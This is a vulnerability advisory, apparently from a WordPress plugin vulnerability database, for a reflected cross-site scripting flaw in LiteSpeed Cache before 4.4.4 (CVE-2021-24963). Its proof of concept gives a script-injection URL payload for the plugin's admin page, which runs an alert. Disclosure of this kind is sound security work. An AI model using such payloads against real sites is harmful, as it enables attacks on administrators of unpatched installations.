LiteSpeed Cache < 4.4.4 – Admin+ Reflected Cross-Site Scripting | CVE 2021-24963 | Plugin Vulnerabilities

Description

The plugin does not escape the qc_res parameter before outputting it back in the JS code of an admin page, leading to a Reflected Cross-Site Scripting

Proof of Concept

As admin, enter the following payload in the Domain Key setting of the plugin: </script><script>

Then open https://example.com/wp-admin/admin.php?page=litespeed-general&qc_res=</script><script>alert(/XSS/)</script>&domain_hash=541a0e1df04a2a5b7e4bd3472ff596cc

Affects Plugins

litespeed-cache

Fixed in 4.4.4

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2634373

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Emil Kylander

Submitter

Emil Kylander

Submitter website

https://emilkylander.se

Submitter twitter

Verified

Yes

WPVDB ID

7f8b4275-7586-4e04-afd9-d12bdab6ba9b

Timeline

Publicly Published

2021-11-30 (about 4 years ago)

Added

2021-11-30 (about 4 years ago)

Last Updated

2022-04-09 (about 3 years ago)

Other

Published

Title

Published

2014-08-01

Title

Events Manager Extended - Stored XSS

Published

2014-08-01

Title

java-trackback <= 0.2 - XSS in ZeroClipboard

Published

2023-10-25

Title

Simple User Listing < 1.9.3 - Reflected XSS

Published

2024-06-19

Title

Typing Text < 1.2.6 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-10-02

Title

Flexi <= 4.28 - Authenticated (Contributor+) Stored Cross-Site Scripting via flexi-form-tag Shortcode